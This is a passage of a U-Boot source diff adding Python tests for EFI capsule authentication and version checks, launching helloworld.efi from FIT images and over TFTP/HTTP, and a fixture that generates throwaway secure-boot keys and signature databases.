place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test12'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 3 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test111', 'Test112'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test113'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/version.dtso b/test/py/tests/test_efi_capsule/version.dtso new file mode 100644 index 00000000000..3aebb5b64fb --- /dev/null +++ b/test/py/tests/test_efi_capsule/version.dtso @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; +/plugin/; + +&{/} { + firmware-version { + image1 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "985F2937-7C2E-5E9A-8A5E-8E063312964B"; + }; + image2 { + lowest-supported-version = <7>; + image-index = <2>; + image-type-id = "9E339473-C2EB-530A-A69B-0CD6BBBED40E"; + }; + image3 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "46610520-469E-59DC-A8DD-C11832B877EA"; + }; + }; +}; diff --git a/test/py/tests/test_efi_fit.py b/test/py/tests/test_efi_fit.py new file mode 100644 index 00000000000..5f352e7efff --- /dev/null +++ b/test/py/tests/test_efi_fit.py @@ -0,0 +1,467 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Cristian Ciocaltea <cristian.ciocaltea@gmail.com> +# +# Work based on: +# - test_net.py +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# - test_fit.py +# Copyright (c) 2013, Google Inc. +# +# Test launching UEFI binaries from FIT images. + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +# Additionally, when the 'size' is not available, the file will be generated +# automatically in the TFTP root directory, as specified by the 'dn' field. +env__efi_fit_tftp_file = { + 'fn': 'test-efi-fit.img', # File path relative to TFTP root + 'size': 3831, # File size + 'crc32': '9fa3f79c', # Checksum using CRC-32 algorithm, optional + 'addr': 0x40400000, # Loading address, integer, optional + 'dn': 'tftp/root/dir', # TFTP root directory path, optional +} +""" + +import os.path +import pytest +import utils + +# Define the parametrized ITS data to be used for FIT images generation. +ITS_DATA = ''' +/dts-v1/; + +/ { + description = "EFI image with FDT blob"; + #address-cells = <1>; + + images { + efi { + description = "Test EFI"; + data = /incbin/("%(efi-bin)s"); + type = "%(kernel-type)s"; + arch = "%(sys-arch)s"; + os = "efi"; + compression = "%(efi-comp)s"; + load = <0x0>; + entry = <0x0>; + }; + fdt { + description = "Test FDT"; + data = /incbin/("%(fdt-bin)s"); + type = "flat_dt"; + arch = "%(sys-arch)s"; + compression = "%(fdt-comp)s"; + }; + }; + + configurations { + default = "config-efi-fdt"; + config-efi-fdt { + description = "EFI FIT w/ FDT"; + kernel = "efi"; + fdt = "fdt"; + }; + config-efi-nofdt { + description = "EFI FIT w/o FDT"; + kernel = "efi"; + }; + }; +}; +''' + +# Define the parametrized FDT data to be used for DTB images generation. +FDT_DATA = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + model = "%(sys-arch)s %(fdt_type)s EFI FIT Boot Test"; + compatible = "%(sys-arch)s"; + + reset@0 { + compatible = "%(sys-arch)s,reset"; + reg = <0 4>; + }; +}; +''' + +@pytest.mark.buildconfigspec('bootm_efi') +@pytest.mark.buildconfigspec('BOOTEFI_HELLO_COMPILE') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +@pytest.mark.requiredtool('dtc') +def test_efi_fit_launch(ubman): + """Test handling of UEFI binaries inside FIT images. + + The tests are trying to launch U-Boot's helloworld.efi embedded into + FIT images, in uncompressed or gzip compressed format. + + Additionally, a sample FDT blob is created and embedded into the above + mentioned FIT images, in uncompressed or gzip compressed format. + + For more details, see launch_efi(). + + The following test cases are currently defined and enabled: + - Launch uncompressed FIT EFI & internal FDT + - Launch uncompressed FIT EFI & FIT FDT + - Launch compressed FIT EFI & internal FDT + - Launch compressed FIT EFI & FIT FDT + """ + + def net_pre_commands(): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment + at the beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + + def net_dhcp(): + """Execute the dhcp command. + + The boardenv_* file may be used to enable/disable DHCP; see the + comment at the beginning of this file. + """ + + has_dhcp = ubman.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + ubman.log.warning('CONFIG_CMD_DHCP != y: Skipping DHCP network setup') + return False + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + ubman.log.info('No DHCP server available') + return False + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + return True + + def net_setup_static(): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + has_dhcp = ubman.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + ubman.log.warning('CONFIG_NET != y: Skipping static network setup') + return False + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + ubman.log.info('No static network configuration is defined') + return False + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + return True + + def make_fpath(file_name): + """Compute the path of a given (temporary) file. + + Args: + file_name -- The name of a file within U-Boot build dir. + Return: + The computed file path. + """ + + return os.path.join(ubman.config.build_dir, file_name) + + def make_efi(fname, comp): + """Create an UEFI binary. + + This simply copies lib/efi_loader/helloworld.efi into U-Boot + build dir and, optionally, compresses the file using gzip. + + Args: + fname -- The target file name within U-Boot build dir. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + bin_path = make_fpath(fname) + utils.run_and_log(ubman, + ['cp', make_fpath('lib/efi_loader/helloworld.efi'), + bin_path]) + if comp: + utils.run_and_log(ubman, ['gzip', '-f', bin_path]) + bin_path += '.gz' + return bin_path + + def make_dtb(fdt_type, comp): + """Create a sample DTB file. + + Creates a DTS file and compiles it to a DTB. + + Args: + fdt_type -- The type of the FDT, i.e. internal, user. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + # Generate resources referenced by FDT. + fdt_params = { + 'sys-arch': sys_arch, + 'fdt_type': fdt_type, + } + + # Generate a test FDT file. + dts = make_fpath('test-efi-fit-%s.dts' % fdt_type) + with open(dts, 'w', encoding='ascii') as file: + file.write(FDT_DATA % fdt_params) + + # Build the test FDT. + dtb = make_fpath('test-efi-fit-%s.dtb' % fdt_type) + utils.run_and_log(ubman, + ['dtc', '-I', 'dts', '-O', 'dtb', '-o', dtb, dts]) + if comp: + utils.run_and_log(ubman, ['gzip', '-f', dtb]) + dtb += '.gz' + return dtb + + def make_fit(comp): + """Create a sample FIT image. + + Runs 'mkimage' to create a FIT image within U-Boot build dir. + Args: + comp -- Enable gzip compression for the EFI binary and FDT blob. + Return: + The path of the created file. + """ + + # Generate resources referenced by ITS. + its_params = { + 'sys-arch': sys_arch, + 'efi-bin': os.path.basename(make_efi('test-efi-fit-helloworld.efi', comp)), + 'kernel-type': 'kernel' if comp else 'kernel_noload', + 'efi-comp': 'gzip' if comp else 'none', + 'fdt-bin': os.path.basename(make_dtb('user', comp)), + 'fdt-comp': 'gzip' if comp else 'none', + } + + # Generate a test ITS file. + its_path = make_fpath('test-efi-fit-helloworld.its') + with open(its_path, 'w', encoding='ascii') as file: + file.write(ITS_DATA % its_params) + + # Build the test ITS. + fit_path = make_fpath('test-efi-fit-helloworld.fit') + utils.run_and_log( + ubman, [make_fpath('tools/mkimage'), '-f', its_path, fit_path]) + return fit_path + + def load_fit_from_host(fit): + """Load the FIT image using the 'host load' command and return its address. + + Args: + fit -- Dictionary describing the FIT image to load, see + env__efi_fit_test_file in the comment at the beginning of + this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + output = ubman.run_command( + 'host load hostfs - %x %s/%s' % (addr, fit['dn'], fit['fn'])) + expected_text = ' bytes read' + size = fit.get('size', None) + if size: + expected_text = '%d' % size + expected_text + assert expected_text in output + + return addr + + def load_fit_from_tftp(fit): + """Load the FIT image using the tftpboot command and return its address. + + The file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + Args: + fit -- Dictionary describing the FIT image to load, see env__efi_fit_tftp_file + in the comment at the beginning of this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + file_name = fit['fn'] + output = ubman.run_command('tftpboot %x %s' % (addr, file_name)) + expected_text = 'Bytes transferred = ' + size = fit.get('size', None) + if size: + expected_text += '%d' % size + assert expected_text in output + + expected_crc = fit.get('crc32', None) + if not expected_crc: + return addr + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = ubman.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + + return addr + + def launch_efi(enable_fdt, enable_comp): + """Launch U-Boot's helloworld.efi binary from a FIT image. + + An external image file can be downloaded from TFTP, when related + details are provided by the boardenv_* file; see the comment at the + beginning of this file. + + If the size of the TFTP file is not provided within env__efi_fit_tftp_file, + the test image is generated automatically and placed in the TFTP root + directory specified via the 'dn' field. + + When running the tests on Sandbox, the image file is loaded directly + from the host filesystem. + + Once the load address is available on U-Boot console, the 'bootm' + command is executed for either 'config-efi-fdt' or 'config-efi-nofdt' + FIT configuration, depending on the value of the 'enable_fdt' function + argument. + + Eventually the 'Hello, world' message is expected in the U-Boot console. + + Args: + enable_fdt -- Flag to enable using the FDT blob inside FIT image. + enable_comp -- Flag to enable GZIP compression on EFI and FDT + generated content. + """ + + with ubman.log.section('FDT=%s;COMP=%s' % (enable_fdt, enable_comp)): + if is_sandbox: + fit = { + 'dn': ubman.config.build_dir, + } + else: + # Init networking. + net_pre_commands() + net_set_up = net_dhcp() + net_set_up = net_setup_static() or net_set_up + if not net_set_up: + pytest.skip('Network not initialized') + + fit = ubman.config.env.get('env__efi_fit_tftp_file', None) + if not fit: + pytest.skip('No env__efi_fit_tftp_file binary specified in environment') + + size = fit.get('size', None) + if not size: + if not fit.get('dn', None): + pytest.skip('Neither "size", nor "dn" info provided in env__efi_fit_tftp_file') + + # Create test FIT image. + fit_path = make_fit(enable_comp) + fit['fn'] = os.path.basename(fit_path) + fit['size'] = os.path.getsize(fit_path) + + # Copy image to TFTP root directory. + if fit['dn'] != ubman.config.build_dir: + utils.run_and_log(ubman, + ['mv', '-f', fit_path, '%s/' % fit['dn']]) + + # Load FIT image. + addr = load_fit_from_host(fit) if is_sandbox else load_fit_from_tftp(fit) + + # Select boot configuration. + fit_config = 'config-efi-fdt' if enable_fdt else 'config-efi-nofdt' + + # Try booting. + output = ubman.run_command('bootm %x#%s' % (addr, fit_config)) + if enable_fdt: + assert 'Booting using the fdt blob' in output + assert 'Hello, world' in output + assert '## Application failed' not in output + ubman.restart_uboot() + + # Array slice removes leading/trailing quotes. + sys_arch = ubman.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + if sys_arch == 'arm': + arm64 = ubman.config.buildconfig.get('config_arm64') + if arm64: + sys_arch = 'arm64' + + is_sandbox = sys_arch == 'sandbox' + + if is_sandbox: + old_dtb = ubman.config.dtb + + try: + if is_sandbox: + # Use our own device tree file, will be restored afterwards. + control_dtb = make_dtb('internal', False) + ubman.config.dtb = control_dtb + + # Run tests + # - fdt OFF, gzip OFF + launch_efi(False, False) + # - fdt ON, gzip OFF + launch_efi(True, False) + + if is_sandbox: + # - fdt OFF, gzip ON + launch_efi(False, True) + # - fdt ON, gzip ON + launch_efi(True, True) + + finally: + if is_sandbox: + # Go back to the original U-Boot with the correct dtb. + ubman.config.dtb = old_dtb + ubman.restart_uboot() diff --git a/test/py/tests/test_efi_loader.py b/test/py/tests/test_efi_loader.py new file mode 100644 index 00000000000..58f2655191f --- /dev/null +++ b/test/py/tests/test_efi_loader.py @@ -0,0 +1,236 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# Copyright (c) 2016, Alexander Graf <agraf@suse.de> +# +# based on test_net.py. + +# Test efi loader implementation + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__efi_loader_helloworld_file = { + 'fn': 'lib/efi_loader/helloworld.efi', # file name + 'size': 5058624, # file length in bytes + 'crc32': 'c2244b26', # CRC32 check sum + 'addr': 0x40400000, # load address +} + +# False if the helloworld EFI over HTTP boot test should be performed. +# If HTTP boot testing is not possible or desired, set this variable to True or +# ommit it. +env__efi_helloworld_net_http_test_skip = True +""" + +import pytest +import utils + +PROTO_TFTP, PROTO_HTTP = range(0, 2) + +net_set_up = False + +def test_efi_pre_commands(ubman): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_efi_setup_dhcp(ubman): + """Set up the network using DHCP. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No DHCP server available') + return + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_efi_setup_static(ubman): + """Set up the network using a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No static network configuration is defined') + return None + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +def fetch_file(ubman, env_conf, proto): + """Grab an env described file via TFTP or HTTP and return its address + + A file as described by an env config <env_conf> is downloaded from the + server. The address to that file is returned. + """ + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get(env_conf, None) + if not f: + pytest.skip('No %s binary specified in environment' % env_conf) + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + if proto == PROTO_TFTP: + cmd = 'tftpboot' + elif proto == PROTO_HTTP: + cmd = 'wget' + else: + assert False + output = ubman.run_command('%s %x %s' % (cmd, addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return addr + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = ubman.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + + return addr + +def do_test_efi_helloworld_net(ubman, proto): + addr = fetch_file(ubman, 'env__efi_loader_helloworld_file', proto) + + output = ubman.run_command('bootefi %x' % addr) + expected_text = 'Hello, world' + assert expected_text in output + expected_text = '## Application failed' + assert expected_text not in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('bootefi_hello_compile') +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_efi_helloworld_net_tftp(ubman): + """Run the helloworld.efi binary via TFTP. + + The helloworld.efi file is downloaded from the TFTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + + do_test_efi_helloworld_net(ubman, PROTO_TFTP); + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('bootefi_hello_compile') +@pytest.mark.buildconfigspec('cmd_wget') +def test_efi_helloworld_net_http(ubman): + """Run the helloworld.efi binary via HTTP. + + The helloworld.efi file is downloaded from the HTTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + if ubman.config.env.get('env__efi_helloworld_net_http_test_skip', True): + pytest.skip('helloworld.efi HTTP test is not enabled!') + + do_test_efi_helloworld_net(ubman, PROTO_HTTP); + +@pytest.mark.buildconfigspec('cmd_bootefi_hello') +def test_efi_helloworld_builtin(ubman): + """Run the builtin helloworld.efi binary. + + The helloworld.efi file is included in U-Boot, execute it using the + special "bootefi hello" command. + """ + + output = ubman.run_command('bootefi hello') + expected_text = 'Hello, world' + assert expected_text in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('cmd_bootefi') +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_efi_grub_net(ubman): + """Run the grub.efi binary via TFTP. + + The grub.efi file is downloaded from the TFTP server and gets + executed. + """ + + addr = fetch_file(ubman, 'env__efi_loader_grub_file', PROTO_TFTP) + + ubman.run_command('bootefi %x' % addr, wait_for_prompt=False) + + # Verify that we have an SMBIOS table + check_smbios = ubman.config.env.get('env__efi_loader_check_smbios', False) + if check_smbios: + ubman.wait_for('grub>') + ubman.run_command('lsefisystab', wait_for_prompt=False, wait_for_echo=False) + ubman.wait_for('SMBIOS') + + # Then exit cleanly + ubman.wait_for('grub>') + ubman.run_command('exit', wait_for_prompt=False, wait_for_echo=False) + ubman.wait_for(ubman.prompt) + # And give us our U-Boot prompt back + ubman.run_command('') diff --git a/test/py/tests/test_efi_secboot/conftest.py b/test/py/tests/test_efi_secboot/conftest.py new file mode 100644 index 00000000000..0fa0747fc76 --- /dev/null +++ b/test/py/tests/test_efi_secboot/conftest.py @@ -0,0 +1,254 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI secure boot test.""" + +from subprocess import call, check_call, CalledProcessError +import pytest +from defs import * + +@pytest.fixture(scope='session') +def efi_boot_env(request, u_boot_config): + """Set up a file system to be used in UEFI secure boot test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot.img' + + try: + mnt_point = u_boot_config.build_dir + '/mnt_efisecure' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # suffix + # *.key: RSA private key in PEM + # *.crt: X509 certificate (self-signed) in PEM + # *.esl: signature list + # *.hash: message digest of image as signature list + # *.auth: signed signature list in signature database format + # *.efi: UEFI image + # *.efi.signed: signed UEFI image + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -t "2020-04-01" -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # PK_null for deletion + check_call('cd %s; touch PK_null.esl; %ssign-efi-sig-list -t "2020-04-02" -c PK.crt -k PK.key PK PK_null.esl PK_null.auth' + % (mnt_point, EFITOOLS_PATH), shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -t "2020-04-03" -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db/ -keyout db.key -out db.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db.crt db.esl; %ssign-efi-sig-list -t "2020-04-04" -c KEK.crt -k KEK.key db db.esl db.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db1 + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db1/ -keyout db1.key -out db1.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db1.crt db1.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key db db1.esl db1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db2 (APPEND_WRITE) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db2/ -keyout db2.key -out db2.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db2.crt db2.esl; %ssign-efi-sig-list -a -c KEK.crt -k KEK.key db db2.esl db2.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx (TEST_dbx certificate) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_dbx/ -keyout dbx.key -out dbx.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s dbx.crt dbx.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx.esl dbx.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash (digest of TEST_db certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db.crt dbx_hash.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash.crl dbx_hash.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 384 db.crt dbx_hash384.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash384.crl dbx_hash384.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 512 db.crt dbx_hash512.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash512.crl dbx_hash512.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash1 (digest of TEST_db1 certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db1.crt dbx_hash1.crl; %ssign-efi-sig-list -t "2020-04-06" -c KEK.crt -k KEK.key dbx dbx_hash1.crl dbx_hash1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash2 (digest of TEST_db2 certificate, with APPEND_WRITE) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db2.crt dbx_hash2.crl; %ssign-efi-sig-list -a -c KEK.crt -k KEK.key dbx dbx_hash2.crl dbx_hash2.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_db (with TEST_db certificate) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx db.esl dbx_db.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + # Copy image + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, 